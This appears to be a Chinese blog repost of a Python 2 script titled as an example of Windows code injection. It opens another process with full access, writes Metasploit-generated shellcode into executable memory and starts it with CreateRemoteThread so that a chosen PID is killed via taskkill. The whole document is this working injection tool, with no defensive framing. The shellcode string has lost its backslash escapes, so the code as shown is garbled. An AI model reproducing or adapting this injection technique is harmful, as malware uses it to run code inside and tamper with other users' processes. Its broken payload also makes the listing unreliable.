用python写windows code inject的一个例子

用python写windows code inject的一个例子

hi.baidu.com/80sec

import sys
from ctypes import *

PAGE_EXECUTE_READWRITE         = 0x00000040
PROCESS_ALL_ACCESS =     ( 0x000F0000 | 0x00100000 | 0xFFF )
VIRTUAL_MEM        =     ( 0x1000 | 0x2000 )

kernel32      = windll.kernel32
pid           = int(sys.argv[1])
pid_to_kill   = sys.argv[2]

if not sys.argv[1] or not sys.argv[2]:
    print "Code Injector: ./code_injector.py <PID to inject> <PID to Kill>"
    sys.exit(0)

#/* win32_exec - EXITFUNC=thread CMD=cmd.exe /c taskkill /PID AAAA
#Size=159 Encoder=None asploit.com">http://metasploit.com */
shellcode =
"xfcxe8x44x00x00x00x8bx45x3cx8bx7cx05x78x01xefx8b"
"x4fx18x8bx5fx20x01xebx49x8bx34x8bx01xeex31xc0x99"
"xacx84xc0x74x07xc1xcax0dx01xc2xebxf4x3bx54x24x04"
"x75xe5x8bx5fx24x01xebx66x8bx0cx4bx8bx5fx1cx01xeb"
"x8bx1cx8bx01xebx89x5cx24x04xc3x31xc0x64x8bx40x30"
"x85xc0x78x0cx8bx40x0cx8bx70x1cxadx8bx68x08xebx09"
"x8bx80xb0x00x00x00x8bx68x3cx5fx31xf6x60x56x89xf8"
"x83xc0x7bx50x68xefxcexe0x60x68x98xfex8ax0ex57xff"
"xe7x63x6dx64x2ex65x78x65x20x2fx63x20x74x61x73x6b"
"x6bx69x6cx6cx20x2fx50x49x44x20x41x41x41x41x00"

padding       = 4 - (len( pid_to_kill ))
replace_value = pid_to_kill + ( "x00" * padding )
replace_string= "x41" * 4

shellcode     = shellcode.replace( replace_string, replace_value )
code_size     = len(shellcode)

# Get a handle to the process we are injecting into.
h_process = kernel32.OpenProcess( PROCESS_ALL_ACCESS, False, int(pid) )

if not h_process:

    print "[*] Couldnt acquire a handle to PID: %s" % pid
    sys.exit(0)

# Allocate some space for the shellcode
arg_address = kernel32.VirtualAllocEx( h_process, 0, code_size, VIRTUAL_MEM, PAGE_EXECUTE_READWRITE)

# Write out the shellcode
written = c_int(0)
kernel32.WriteProcessMemory(h_process, arg_address, shellcode, code_size, byref(written))

# Now we create the remote thread and point its entry routine
# to be head of our shellcode
thread_id = c_ulong(0)
if not kernel32.CreateRemoteThread(h_process,None,0,arg_address,None,0,byref(thread_id)):

    print "[*] Failed to inject process-killing shellcode. Exiting."
    sys.exit(0)

print "[*] Remote thread successfully created with a thread ID of: 0x%08x" % thread_id.value
print "[*] Process %s should not be running anymore!" % pid_to_kill